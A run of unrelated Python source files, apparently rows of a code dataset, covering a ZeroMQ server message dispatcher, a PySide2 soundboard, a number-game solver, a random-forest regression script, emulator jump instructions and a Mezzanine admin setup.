dictServerLoad[message.fromId] = dictServerLoad.get(
message.fromId, 0) + 1
dictClientServer[session_key] = CConnectionItem(
message.fromId)
else:
dictClientServer[session_key].server_id = message.fromId
dictClientServer[
session_key].dt_active = datetime.datetime.now()
if message.addition.lower() == 'y': # need redirect checking
listRelayeres = SBDB.GetRelayeresByAccountId(
message.fromId)
target_server_id = -1
for relayer_id in listRelayeres:
if relayer_id in dictRelayerServer:
# if there is a relayer connected to that account is connected on the same server with the account connection, don't redirect the account connection
if dictRelayerServer[
relayer_id].server_id == message.fromId:
return
else:
target_server_id = relayer_id
if target_server_id > -1:
RedirectHumanTo(message.destId, target_server_id)
elif message.operation == OPER_OFFLINE:
if session_key in dictClientServer:
dictServerLoad[message.fromId] = dictServerLoad.get(
message.fromId, 0) - 1
dictClientServer.pop(session_key)
elif (message.destType[1] == TTYPE_GATEWAY):
if message.operation == OPER_ONLINE:
if message.destId not in dictRelayerServer:
dictServerLoad[message.fromId] = dictServerLoad.get(
message.fromId, 0) + 1
dictRelayerServer[message.destId] = CConnectionItem(
message.fromId)
else:
dictRelayerServer[
message.destId].server_id = message.fromId
dictRelayerServer[
message.destId].dt_active = datetime.datetime.now()
elif message.operation == OPER_OFFLINE:
if message.destId in dictRelayerServer:
dictServerLoad[message.fromId] = dictServerLoad.get(
message.fromId, 0) - 1
dictRelayerServer.pop(message.destId)
def RunTransmitMessage(message):
if message.operation in [OPER_REQUEST, OPER_RESPONSE]:
length, command_id = struct.unpack("!2I", message.body[:8])
command = None
try:
command = Command.dicInt_Type[command_id](message.body,
protocolInternal)
except Exception as e:
print(traceback.format_exc())
logging.error(
"build command exception in protocolInternal transport %d: %s :%s",
id(protocolInternal.transport), str(e),
Util.asscii_string(message.body))
command = None
command.internalMessage = message
# threads.deferToThread(command.Run)
command.Run()
elif message.operation == OPER_REDIRECT:
notify = RedirectNotify.CRedirectNotify(
client_id=message.destId, addr=message.addition)
notify.Notify()
def RunServerMessage(message):
if message.operation == OPER_LOAD:
AddSubscribeServer(SBDB.GetServers(SBDB.CV_TYPE_SERVER_FUNCTION))
AddSubscribeServer(
SBDB.GetServers(SBDB.CV_TYPE_SERVER_SUPERVISION),
SBDB.CV_TYPE_SERVER_SUPERVISION)
if message.fromType == TTYPE_MANAGEMENT:
message.fromType = TTYPE_SERVER
message.Send()
SBDB.UpdateActiveTimeServer(MyServerID)
dictProcessor = {
ord('o'): RunOnlineMessage,
ord('g'): RunTransmitMessage,
ord('h'): RunTransmitMessage,
ord('s'): RunServerMessage
}
countPendingCmd = 0
lockPendingCmd = threading.RLock()
def ProcessMessage(head, from_filter, body):
try:
global countPendingCmd, lockPendingCmd
print("data received of InternalMessage %s:%s:%s (%s%s%s)" %
(head, from_filter, body, Util.asscii_string(head),
Util.asscii_string(from_filter), Util.asscii_string(body)))
message = CInternalMessage(head, from_filter, body)
typeMessage = message.destType[0]
print("44444", message, typeMessage, type(typeMessage), dictProcessor)
if typeMessage in dictProcessor:
print("55555", typeMessage)
dictProcessor[typeMessage](message)
with lockPendingCmd:
countPendingCmd = countPendingCmd - 1
except:
print(traceback.format_exc())
def Run():
from SBPS import ProtocolReactor
global socketSubscribe, socketPublish, MyServerType, context, countPendingCmd, lockPendingCmd
context = zmq.Context()
socketSubscribe = context.socket(zmq.SUB)
socketPublish = context.socket(zmq.PUB)
AddSubscribeServer(SBDB.GetServers(SBDB.CV_TYPE_SERVER_FUNCTION))
AddSubscribeServer(
SBDB.GetServers(SBDB.CV_TYPE_SERVER_SUPERVISION),
SBDB.CV_TYPE_SERVER_SUPERVISION)
socketPublish.bind("tcp://*:%d" % (PORT_PUBSUB))
RegistFilter(TTYPE_SERVER, 0)
RegistFilter(TTYPE_SERVER, MyServerID)
if MyServerType == SBDB.CV_TYPE_SERVER_SUPERVISION:
threading.Thread(target=traced_ThreadCheckMaps, daemon=True).start()
RegistFilter(TTYPE_ONLINEOFFLINE)
while not ProtocolReactor.bReactorStopped:
try:
[head, from_filter, body] = socketSubscribe.recv_multipart()
with lockPendingCmd:
if countPendingCmd < Config.count_connection:
countPendingCmd = countPendingCmd + 1
threads.deferToThread(ProcessMessage, head, from_filter,
body)
except:
print(traceback.format_exc())
print("InternalMessage.Run() returned")
def traced_Run():
try:
Run()
except:
print(traceback.format_exc())
def Stop():
try:
if protocolInternal:
protocolInternal.timer.cancel()
socketPublish.close()
socketSubscribe.close()
context.term()
except:
print(traceback.format_exc())
|
991,447 | 27dcd3afb436a08c860bfb7743404fbfffbbaed3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Application de SoundBoard avec interface Qt
======================
Exécuter pour commencer l'utilisation de la SoundBoard.
"""
import json
from PySide2.QtCore import (QRect, QSize)
from PySide2.QtWidgets import (
QApplication, QDialog, QVBoxLayout, QHBoxLayout, QGroupBox, QLabel,
QGridLayout, QPushButton, QToolButton, QTableWidget, QLineEdit,
QSpacerItem, QSizePolicy, QHeaderView, QTableWidgetItem, QFileDialog,
QWidget, QColorDialog)
from PySide2.QtGui import (QIcon, QPixmap, QColor)
import sys
import operator
from math import sqrt, ceil
import vlc
soundRep = "./sons/"
instance = vlc.Instance()
p = instance.media_player_new()
class SoundBoard(QDialog):
def __init__(self):
super(SoundBoard, self).__init__()
self.title = '=== SoundBoard ==='
# positionnement de la fenêtre à l'ouverture
self.left = 50
self.top = 50
# initialisation de la largeur et hauteur par défaut
self.width = 500
self.height = 500
self.currFileName = ""
self.pbPosToModify = -1
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.windowLayout = QHBoxLayout()
self.tableWidget = QTableWidget()
self.tableWidget.horizontalHeader().hide()
self.tableWidget.verticalHeader().hide()
self.initIcons()
self.initMenu()
self.initColorPicker()
self.initButtons()
self.windowLayout.setStretch(1, 0)
self.setLayout(self.windowLayout)
self.show()
def initIcons(self):
self.iEdit = QIcon()
self.iEdit.addPixmap(QPixmap(
"./icons/edit.png"), QIcon.Normal, QIcon.Off)
self.iPlus = QIcon()
self.iPlus.addPixmap(QPixmap(
"./icons/plus.png"), QIcon.Normal, QIcon.Off)
self.iMinus = QIcon()
self.iMinus.addPixmap(QPixmap(
"./icons/minus.png"), QIcon.Normal, QIcon.Off)
self.iParam = QIcon()
self.iParam.addPixmap(QPixmap(
"./icons/cog.png"), QIcon.Normal, QIcon.Off)
def initMenu(self):
layout = QVBoxLayout()
hlayout = QHBoxLayout()
# bouton ajout
self.tbPlus = QToolButton()
self.tbPlus.setGeometry(QRect(0, 0, 32, 32))
self.tbPlus.setIcon(self.iPlus)
self.tbPlus.setObjectName("tbPlus")
hlayout.addWidget(self.tbPlus)
self.tbPlus.clicked.connect(self.add)
# bouton suppression
self.tbMinus = QToolButton()
self.tbMinus.setGeometry(QRect(0, 0, 32, 32))
self.tbMinus.setIcon(self.iMinus)
self.tbMinus.setObjectName("tbMinus")
hlayout.addWidget(self.tbMinus)
self.tbMinus.clicked.connect(self.delete)
# bouton édition
self.tbEdit = QToolButton()
self.tbEdit.setGeometry(QRect(0, 0, 32, 32))
self.tbEdit.setIcon(self.iEdit)
self.tbEdit.setObjectName("tbEdit")
hlayout.addWidget(self.tbEdit)
self.tbEdit.clicked.connect(self.editBtn)
# bouton paramètres
self.tbParam = QToolButton()
self.tbParam.setGeometry(QRect(0, 0, 32, 32))
self.tbParam.setIcon(self.iParam)
self.tbParam.setObjectName("tbParam")
hlayout.addWidget(self.tbParam)
self.tbParam.clicked.connect(self.settings)
layout.addLayout(hlayout)
self.pbStop = QPushButton("Don't STOP\n\nthe\n\nSoundBoard")
self.pbStop.setStyleSheet("font-weight: bold;")
self.pbStop.setMinimumSize(QSize(100, 100))
self.pbStop.setGeometry(QRect(0, 0, 100, 100))
layout.addWidget(self.pbStop)
self.pbStop.clicked.connect(self.stop)
spacerMenu = QSpacerItem(
20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)
layout.addItem(spacerMenu)
self.windowLayout.addLayout(layout)
def startInitButtons(self):
self.tableWidget.clear()
self.tableWidget.clearSpans()
self.tableWidget.setColumnWidth(0, 100)
self.tableWidget.setColumnWidth(2, 100)
self.cdColorPicker.setVisible(False)
self.tableWidget.horizontalHeader().hide()
# import des informations boutons contenues dans le json
with open('buttons.json', encoding='utf-8') as json_file:
self.data_buttons = json.load(json_file)
# stockage de la position la plus élevée pour le cadrage
self.positions = [p['position'] for p in self.data_buttons['buttons']]
self.max_pos = max(self.positions)
# calcul du nombre de boutons par hauteur et largeur
self.BtnH = self.data_buttons['buttons_grid']['height']
self.BtnW = self.data_buttons['buttons_grid']['width']
self.setGeometry(self.left, self.top,
140 + self.BtnW*100,
175 if self.BtnH*31 < 175 else 25 + self.BtnH*30)
self.tableWidget.setColumnCount(self.BtnW)
self.tableWidget.setRowCount(self.BtnH)
def endInitButtons(self):
buttonsLayout = QVBoxLayout()
buttonsLayout.setStretch(0, 1)
buttonsLayout.addWidget(self.tableWidget)
self.windowLayout.addLayout(buttonsLayout)
self.setGeometry(self.left, self.top,
140 + self.BtnW*100,
175 if self.BtnH*31 < 175 else 25 + self.BtnH*30)
def initButtons(self):
self.startInitButtons()
# positionnement des boutons en fonction des positions du json
for ligne in range(self.BtnH):
for colonne in range(self.BtnW):
if (ligne*self.BtnW)+(colonne+1) in self.positions:
for b in self.data_buttons['buttons']:
if b['position'] == (ligne*self.BtnW)+(colonne+1):
pb = QPushButton(b['name'][:9])
pb.setProperty('pbPos', b['position'])
# si fond clair, font noire, si sombre, font blanche
if (b['r']*0.299 + b['g']*0.587 + b['b']*0.114) > 186:
pb.setStyleSheet(
f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #000000;")
else:
pb.setStyleSheet(
f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #ffffff;")
self.tableWidget.setCellWidget(
ligne, colonne, pb)
pb.clicked.connect(self.play)
else:
pb = QPushButton('Nouveau')
calcPos = self.BtnW*ligne + colonne + 1
pb.setProperty('pbPos', f"nouveau,{calcPos}")
pb.clicked.connect(self.add)
self.tableWidget.setCellWidget(
ligne, colonne, pb)
colonne += 1
ligne += 1
self.endInitButtons()
def initColorPicker(self):
self.lColorPicker = QVBoxLayout()
self.cdColorPicker = QColorDialog()
self.cdColorPicker.setOption(self.cdColorPicker.NoButtons, True)
self.colorSelected = self.cdColorPicker.currentColor()
self.lColorPicker.addWidget(self.cdColorPicker)
self.cdColorPicker.setVisible(False)
self.cdColorPicker.currentColorChanged.connect(self.colorChanged)
self.windowLayout.addLayout(self.lColorPicker)
def play(self):
pb = self.sender()
pbPos = pb.property('pbPos')
for b in self.data_buttons['buttons']:
if pbPos == b['position']:
pbFile = b['file']
if (p.get_state() == vlc.State.Playing):
p.stop()
media = instance.media_new(soundRep + pbFile)
if (self.currFileName != pbFile):
p.set_media(media)
p.play()
self.currFileName = pbFile
else:
media = instance.media_new(soundRep + pbFile)
p.set_media(media)
p.play()
self.currFileName = pbFile
def stop(self):
p.stop()
def add(self):
self.cdColorPicker.setVisible(True)
self.tableWidget.clear()
self.tableWidget.clearSpans()
self.tableWidget.setColumnWidth(2, 100)
self.tableWidget.setColumnCount(6)
self.tableWidget.setRowCount(len(self.data_buttons['buttons'])+1)
self.tableWidget.horizontalHeader().show()
self.tableWidget.setHorizontalHeaderItem(0, QTableWidgetItem())
self.tableWidget.horizontalHeaderItem(0).setText('Nom')
self.tableWidget.setHorizontalHeaderItem(1, QTableWidgetItem())
self.tableWidget.horizontalHeaderItem(1).setText('Fichier')
self.tableWidget.setHorizontalHeaderItem(2, QTableWidgetItem())
self.tableWidget.horizontalHeaderItem(2).setText('')
self.tableWidget.setColumnWidth(2, 22)
self.tableWidget.setHorizontalHeaderItem(3, QTableWidgetItem())
self.tableWidget.horizontalHeaderItem(3).setText('Position')
self.tableWidget.setHorizontalHeaderItem(4, QTableWidgetItem())
self.tableWidget.horizontalHeaderItem(4).setText('Couleur')
self.tableWidget.setHorizontalHeaderItem(5, QTableWidgetItem())
self.tableWidget.horizontalHeaderItem(5).setText('')
# nom
self.leName = QLineEdit()
self.leName.setPlaceholderText('Nom (10 max.)')
self.tableWidget.setCellWidget(0, 0, self.leName)
# fichier
self.leFile = QLineEdit()
self.leFile.setPlaceholderText('Fichier')
self.tableWidget.setCellWidget(0, 1, self.leFile)
# browse
pbBrowser = QPushButton('...')
pbBrowser.setMinimumSize(QSize(21, 21))
pbBrowser.clicked.connect(self.browseMedia)
self.tableWidget.setCellWidget(0, 2, pbBrowser)
# position
self.lePos = QLineEdit()
self.lePos.setPlaceholderText('Position')
self.tableWidget.setCellWidget(0, 3, self.lePos)
# couleur
self.leColor = QLineEdit()
self.leColor.setPlaceholderText('255,255,255')
self.leColor.setText(str(self.colorSelected.red())+","
+ str(self.colorSelected.green())+","
+ str(self.colorSelected.blue()))
self.tableWidget.setCellWidget(0, 4, self.leColor)
# validation
pbValid = QPushButton('Valider')
pbValid.clicked.connect(self.addValid)
self.tableWidget.setCellWidget(0, 5, pbValid)
pb = self.sender()
pbPos = pb.property('pbPos')
if pbPos is not None:
if str(pbPos)[:8] == 'nouveau,':
self.lePos.setText(pbPos[8:])
def sortByPos(val):
return val['position']
self.data_buttons['buttons'].sort(key=sortByPos)
for ligne, b in enumerate(self.data_buttons['buttons'], start=1):
self.tableWidget.setSpan(ligne, 1, 1, 2)
self.tableWidget.setCellWidget(ligne, 0, QLabel(b['name']))
self.tableWidget.setCellWidget(ligne, 1, QLabel(b['file']))
self.tableWidget.setCellWidget(
ligne, 3, QLabel(str(b['position'])))
self.tableWidget.setCellWidget(ligne, 4, QLabel('Couleur'))
# 530 color picker width
self.setGeometry(self.left, self.top, 690+530, 300)
def addValid(self):
gName = self.leName.text()
self.leName.setStyleSheet("color: rgb(0,0,0);")
gFile = self.leFile.text()
self.leFile.setStyleSheet("color: rgb(0,0,0);")
gPos = self.lePos.text()
self.lePos.setStyleSheet("color: rgb(0,0,0);")
gColor = self.leColor.text()
self.leColor.setStyleSheet("color: rgb(0,0,0);")
# si champs vides
if ((gName == '' or gName == 'Obligatoire !')
or (gFile == '' or gFile == 'Obligatoire !')
or (gPos == '' or gColor == 'Obligatoire !')
or (gColor == '' or gColor == 'Obligatoire !')):
if gName == '' or gName == 'Obligatoire !':
self.leName.setText('Obligatoire !')
self.leName.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
if gFile == '' or gFile == 'Obligatoire !':
self.leFile.setText('Obligatoire !')
self.leFile.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
if gPos == '' or gColor == 'Obligatoire !':
self.lePos.setText('Obligatoire !')
self.lePos.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
if gColor == '' or gColor == 'Obligatoire !':
self.leColor.setText('Obligatoire !')
self.leColor.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
else:
# vérif si champ position est un nombre
try:
flag = 0
flag = int(gPos)
except ValueError:
self.lePos.setText(
f"{str(gPos)} n'est pas un nombre")
self.lePos.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
# si position est un nombre
if flag != 0:
# si position hors grille
if int(gPos) < 0 or int(gPos) > self.data_buttons['buttons_grid']['height']*self.data_buttons['buttons_grid']['width']:
self.lePos.setText(
f"{str(gPos)} hors grille")
self.lePos.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
else:
dictToAppend = {
"name": gName,
"file": gFile,
"position": int(gPos),
"r": self.colorSelected.red(),
"g": self.colorSelected.green(),
"b": self.colorSelected.blue()
}
# si c'est une modification
if self.pbPosToModify != -1:
for b in self.data_buttons['buttons']:
if b['position'] == self.pbPosToModify:
self.data_buttons['buttons'].remove(b)
self.data_buttons['buttons'].append(dictToAppend)
with open('buttons.json', 'w', encoding='utf-8') as outfile:
json.dump(self.data_buttons, outfile, indent=4)
self.initButtons()
else:
# si position déjà prise
if int(gPos) in self.positions:
self.lePos.setText(
f"{str(gPos)} déjà prise")
self.lePos.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
else:
self.data_buttons['buttons'].append(dictToAppend)
with open('buttons.json', 'w', encoding='utf-8') as outfile:
json.dump(self.data_buttons, outfile, indent=4)
self.initButtons()
def delete(self):
self.startInitButtons()
# positionnement des boutons en fonction des positions du json
for ligne in range(self.BtnH):
for colonne in range(self.BtnW):
if (ligne*self.BtnW)+(colonne+1) in self.positions:
for b in self.data_buttons['buttons']:
if b['position'] == (ligne*self.BtnW)+(colonne+1):
pb = QPushButton(b['name'][:9])
pb.setProperty('pbPos', b['position'])
pb.setIcon(self.iMinus)
# si fond clair, font noire, si sombre, font blanche
if (b['r']*0.299 + b['g']*0.587 + b['b']*0.114) > 186:
pb.setStyleSheet(
f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #000000;")
else:
pb.setStyleSheet(
f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #ffffff;")
self.tableWidget.setCellWidget(
ligne, colonne, pb)
pb.clicked.connect(self.deleteTw)
else:
pb = QPushButton('Nouveau')
calcPos = self.BtnW*ligne + colonne + 1
pb.setProperty('pbPos', f"nouveau,{calcPos}")
pb.clicked.connect(self.add)
self.tableWidget.setCellWidget(
ligne, colonne, pb)
colonne += 1
ligne += 1
self.endInitButtons()
def deleteTw(self):
pb = self.sender()
pbPos = pb.property('pbPos')
for b in self.data_buttons['buttons']:
if b['position'] == pbPos:
self.data_buttons['buttons'].remove(b)
with open('buttons.json', 'w', encoding='utf-8') as outfile:
json.dump(self.data_buttons, outfile, indent=4)
self.delete()
def editBtn(self):
self.startInitButtons()
# positionnement des boutons en fonction des positions du json
for ligne in range(self.BtnH):
for colonne in range(self.BtnW):
if (ligne*self.BtnW)+(colonne+1) in self.positions:
for b in self.data_buttons['buttons']:
if b['position'] == (ligne*self.BtnW)+(colonne+1):
pb = QPushButton(b['name'][:9])
pb.setProperty('pbPos', b['position'])
pb.setIcon(self.iEdit)
# si fond clair, font noire, si sombre, font blanche
if (b['r']*0.299 + b['g']*0.587 + b['b']*0.114) > 186:
pb.setStyleSheet(
f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #000000;")
else:
pb.setStyleSheet(
f"background-color: rgb({b['r']},{b['g']},{b['b']}); color: #ffffff;")
self.tableWidget.setCellWidget(
ligne, colonne, pb)
pb.clicked.connect(self.editTw)
else:
pb = QPushButton('Nouveau')
pb.setIcon(self.iEdit)
calcPos = self.BtnW*ligne + colonne + 1
pb.setProperty('pbPos', f"nouveau,{calcPos}")
pb.clicked.connect(self.add)
self.tableWidget.setCellWidget(
ligne, colonne, pb)
colonne += 1
ligne += 1
self.endInitButtons()
def editTw(self):
pb = self.sender()
pbPos = pb.property('pbPos')
self.pbPosToModify = pbPos
self.add()
for b in self.data_buttons['buttons']:
if b['position'] == pbPos:
self.leName.setText(b['name'])
self.leFile.setText(b['file'])
self.lePos.setText(str(b['position']))
self.cdColorPicker.setCurrentColor(
QColor(b['r'], b['g'], b['b']))
def settings(self):
self.tableWidget.clear()
self.tableWidget.clearSpans()
self.tableWidget.setColumnWidth(2, 100)
self.cdColorPicker.setVisible(False)
self.tableWidget.setColumnCount(2)
self.tableWidget.setRowCount(4)
self.tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.tableWidget.horizontalHeader().hide()
# bouton validation
pb = QPushButton('Valider')
self.tableWidget.setCellWidget(3, 0, pb)
pb.clicked.connect(self.saveSettings)
# bouton annulation
pb = QPushButton('Annuler')
self.tableWidget.setCellWidget(3, 1, pb)
pb.clicked.connect(self.refreshUI)
# parameters
self.tableWidget.setSpan(0, 0, 1, 2)
self.lAlert = QLabel("La modification de ces valeurs entrainera la "
"modification de position des boutons")
self.lAlert.setStyleSheet("font-weight: bold;")
self.tableWidget.setCellWidget(
0, 0, self.lAlert)
self.tableWidget.setCellWidget(
1, 0, QLabel('Nombre de boutons en Hauteur'))
self.leH = QLineEdit(str(self.data_buttons['buttons_grid']['height']))
self.tableWidget.setCellWidget(
1, 1, self.leH)
self.tableWidget.setCellWidget(
2, 0, QLabel('Nombre de boutons en Largeur'))
self.leW = QLineEdit(str(self.data_buttons['buttons_grid']['width']))
self.tableWidget.setCellWidget(
2, 1, self.leW)
settingsLayout = QVBoxLayout()
settingsLayout.setStretch(0, 1)
settingsLayout.addWidget(self.tableWidget)
self.windowLayout.addLayout(settingsLayout)
self.setGeometry(self.left, self.top, 600, 300)
def saveSettings(self):
h = int(self.leH.text())
w = int(self.leW.text())
if h*w < self.max_pos:
self.lAlert.setText(
f"Le bouton à la position {str(self.max_pos)} "
f"est en dehors de la grille {h} x {w}")
self.lAlert.setStyleSheet(
"color: rgb(255,0,0); font-weight: bold;")
else:
self.data_buttons['buttons_grid']['height'] = int(self.leH.text())
self.data_buttons['buttons_grid']['width'] = int(self.leW.text())
with open('buttons.json', 'w', encoding='utf-8') as outfile:
json.dump(self.data_buttons, outfile, indent=4)
self.initButtons()
def refreshUI(self):
self.initButtons()
def browseMedia(self):
self.openFile = QFileDialog.getOpenFileName(
self, "Sélectionner un média...", "./sons", "Image Files (*.avi *.mp3 *.wav)")
filenameSplitted = self.openFile[0].split('/')
self.leFile.setText(filenameSplitted[-1])
def colorChanged(self):
self.colorSelected = self.cdColorPicker.currentColor()
self.leColor.setText(str(self.colorSelected.red())+","
+ str(self.colorSelected.green())+","
+ str(self.colorSelected.blue()))
if __name__ == "__main__":
app = QApplication(sys.argv)
mwsb = SoundBoard()
sys.exit(app.exec_())
|
991,448 | 0a7268804c61247fef6dc0f3a7c45afad00f08fc | class Solution:
def solve(self, input, N):
spoken_map, last_spoken = {}, None
for i in range(len(input)):
spoken_map[input[i]] = i + 1,
n = len(input)
last_spoken = input[n - 1]
while n < N:
n += 1
if len(spoken_map[last_spoken]) == 1:
# new number
last_spoken = 0
else:
last_spoken = spoken_map[last_spoken][1] - spoken_map[last_spoken][0]
if last_spoken not in spoken_map:
spoken_map[last_spoken] = n,
elif len(spoken_map[last_spoken]) == 1:
spoken_map[last_spoken] = spoken_map[last_spoken][0], n
else:
spoken_map[last_spoken] = spoken_map[last_spoken][1], n
return last_spoken
if __name__ == '__main__':
s = Solution()
input = [20,9,11,0,1,2]
print(s.solve(input, 2020))
print(s.solve(input, 30000000)) |
991,449 | 196dcd51b8ab6b83133af71bc040fc165d0c3b64 | k = [1, 2, 3, 4, 5]
# increment the 3rd element
def increment(list):
list[2] += 10
print(list)
increment(k)
|
991,450 | 6d3eb6811ee25bbda22be7945e0c252fef228a86 | # Imports
import pandas as pd
import requests
import re
from bs4 import BeautifulSoup, SoupStrainer
import selenium
from selenium import webdriver
import time
import getpass
import matplotlib.pyplot as plt
import seaborn as sns
#################### Analyze and Plot ####################
sns.set_style("white")
sns.set_context('talk')
plt.plot(chess_data_total['my_elo'][40:])
plt.xlabel('Number of Games', fontsize=18)
plt.ylabel('ELO', fontsize=16)
plt.show()
|
991,451 | 4140027e7565e537f78a9fee760e751d267092f6 | # -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pandas import DataFrame,Series
#from sklearn.cross_validation import train_test_split
from sklearn.model_selection import KFold, cross_val_score as CVS, train_test_split as TTS
#from sklearn.linear_model import LinearRegression as LR
#from sklearn.logistic_model import LogisticRegression as LR
from sklearn.linear_model import LogisticRegression as LR
from sklearn.linear_model import RandomizedLogisticRegression as RLR
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
#读取文件
datafile = u'D:\Machine Learning\9 Homework\Concrete_Data.xls'#文件所在位置,u为防止路径中有中文名称,此处没有,可以省略
data = pd.read_excel(datafile)#datafile是excel文件,所以用read_excel,如果是csv文件则用read_csv
examDf = DataFrame(data)
examDf.head()
exam_X = examDf.iloc[: , :-1].values
exam_Y = examDf.iloc[:,-1].values
X_train,X_test,Y_train,Y_test = TTS(exam_X,exam_Y,train_size=.3)#X_train为训练数据标签,X_test为测试数据标签,exam_X为样本特征,exam_y为样本标签,train_size 训练数据占比
#clf = DecisionTreeRegressor(random_state=0)
#rfr = RandomForestRegressor(n_estimators=50,random_state=0)
#clf = clf.fit(X_train,Y_train)
#rfr = rfr.fit(X_train,Y_train)
#score_c = clf.score(X_test,Y_test)
#score_r = rfr.score(X_test,Y_test)
from sklearn.model_selection import cross_val_score
scorel = []
for i in range(10,100):
rfr = RandomForestRegressor(n_estimators=i,n_jobs=-1,random_state=430)
# clf = clf.fit(X_train,Y_train)
rfr = rfr.fit(X_train,Y_train)
# score_c = clf.score(X_test,Y_test)
score = rfr.score(X_test,Y_test)
# score = cross_val_score(rfr,data.data,data.target,cv=10).mean()
scorel.append(score)
print(max(scorel),([*range(10,100)][scorel.index(max(scorel))]))
plt.figure(figsize=[20,5])
plt.plot(range(10,100),scorel)
plt.show()
#
##for i in [X_train, X_test]:
## i.index = range(i.shape[0])
##Xtrain.shape
#reg = LR().fit(X_train, Y_train)
#yhat = reg.predict(X_test)
##print (yhat)
#from sklearn.metrics import mean_squared_error as MSE
#mse = MSE(yhat,Y_test)
##exam_Y.max()
##exam_Y.min()
#import sklearn
##sorted(sklearn.metrics.SCORERS.keys())
#cvs = CVS(reg,exam_X,exam_Y,cv=10,scoring="neg_mean_squared_error")
#
#from sklearn.metrics import r2_score
#score_ = r2_score(yhat,Y_test)
#r2 = reg.score(X_test,Y_test)
##r3 = reg.score(yhat,Y_test)
#
#
#
##r1=RLR()
##r1.fit(x,y)
##r1.get_support(indices=True)
##print(dataf.columns[r1.get_support(indices=True)])
##t=dataf[dataf.columns[r1.get_support(indices=True)]].as_matrix()
##r2=LR()
##r2.fit(t,y)
##print("训练结束")
##
##print("模型正确率:"+str(r2.score(t,y)))
#
## -*- coding: utf-8 -*-
#import pandas as pd
#import numpy as np
#import matplotlib.pyplot as plt
#from pandas import DataFrame,Series
##from sklearn.cross_validation import train_test_split
#from sklearn.model_selection import KFold, cross_val_score as CVS, train_test_split as TTS
#from sklearn.linear_model import LinearRegression as LR
#from sklearn.tree import DecisionTreeClassifier
#from sklearn.ensemble import RandomForestClassifier
#from sklearn.datasets import load_wine
#from sklearn.impute import SimpleImputer
##from sklearn.datasets import load_breast_cancer_wisconsin
#wine = load_wine()
#
##读取文件
##datafile = u'D:/Machine Learning/9 Homework/breast-cancer-wisconsin.cvs'#文件所在位置,u为防止路径中有中文名称,此处没有,可以省略
#data = pd.read_csv('D:\\Machine Learning\\9 Homework\\breast-cancer-wisconsin-2.csv') # 正样本数据
#
#data = data.replace(to_replace = "?", value = np.nan)
## then drop the missing value
#data = data.dropna(how = 'any')
#
#exam_X = data.iloc[:, :-1].values
#exam_Y = data.iloc[:,-1].values
#Xtrain, Xtest, Ytrain, Ytest = TTS(exam_X,exam_Y,test_size=0.3)
#clf = DecisionTreeClassifier(random_state=0)
#rfc = RandomForestClassifier(random_state=0)
#clf = clf.fit(Xtrain,Ytrain)
#rfc = rfc.fit(Xtrain,Ytrain)
#score_c = clf.score(Xtest,Ytest)
#score_r = rfc.score(Xtest,Ytest)
|
991,452 | 03f3ebbb9adde4410ffa55623f3ec184a1edfb47 | from nc8.instruction import Instruction
import nc8.conversions
class JumpInstruction(Instruction):
def __init__(self):
super(JumpInstruction, self).__init__('jmp',
base_opcode=0xc0,
argument_range=(0, 0xf),
instruction_format='jmp {0}')
def parse_arguments(self, arg_value):
return nc8.conversions.convert_offset(arg_value)
def encode_arg(self, offset_str):
return nc8.conversions.convert_to_offset_value(offset_str)
def run(self, machine, offset):
machine.regs['pc'] += offset - 1
def opcode_str(self, offset):
return 'jmp ' + nc8.conversions.convert_offset_str(offset)
class JumpZeroInstruction(Instruction):
def __init__(self):
super(JumpZeroInstruction, self).__init__("jz",
base_opcode=0xa0,
argument_range=(0, 0xf),
instruction_format='jz {0}')
def encode_arg(self, offset_str):
return nc8.conversions.convert_to_offset_value(offset_str)
def parse_arguments(self, arg_value):
return nc8.conversions.convert_offset(arg_value)
def run(self, machine, offset):
if machine.regs['r0'] == 0:
machine.regs['pc'] += offset - 1
def opcode_str(self, argument):
return 'jz {offset}'.format(offset=nc8.conversions.convert_offset_str(argument))
class JumpNotZeroInstruction(Instruction):
def __init__(self):
super(JumpNotZeroInstruction, self).__init__("jnz",
base_opcode=0xb0,
argument_range=(0, 0xf),
instruction_format='jnz {0}')
def encode_arg(self, offset_str):
return nc8.conversions.convert_to_offset_value(offset_str)
def parse_arguments(self, arg_value):
return nc8.conversions.convert_offset(arg_value)
def run(self, machine, offset):
if machine.regs['r0'] != 0:
machine.regs['pc'] += offset - 1
def opcode_str(self, argument):
return 'jnz {offset}'.format(offset=nc8.conversions.convert_offset_str(argument))
|
991,453 | 5ac9e5b04ff5854301be7ac2fbac597abb62531c | #-*- coding: utf-8 -*-
from copy import deepcopy
from django.contrib import admin
from mezzanine.pages.models import RichTextPage
from mezzanine.pages.admin import PageAdmin
from mezzanine.blog.admin import BlogPostAdmin
from mezzanine.blog.models import BlogPost
from .models import *
HomePage_fieldsets = deepcopy(PageAdmin.fieldsets)
HomePage_fieldsets[0][1]["fields"].insert(-1, "baseline")
HomePage_fieldsets[0][1]["fields"].insert(-1, "sub_title")
HomePage_fieldsets[0][1]["fields"].insert(-1, "color_list")
HomePage_fieldsets[0][1]["fields"].insert(-1, "color_caption")
HomePage_fieldsets[0][1]["fields"].insert(-1, "color_caption_text")
HomePage_fieldsets[0][1]["fields"].insert(-1, "slider_timer")
HomePage_fieldsets[0][1]["fields"].insert(-1, "caption")
class HomeCaptionInline(admin.TabularInline):
model = HomeCaption
extra = 5
class HomeVideoInline(admin.TabularInline):
model = HomeVideo
extra = 5
class HomePageAdmin(PageAdmin):
fieldsets = HomePage_fieldsets
inlines = (HomeCaptionInline,HomeVideoInline)
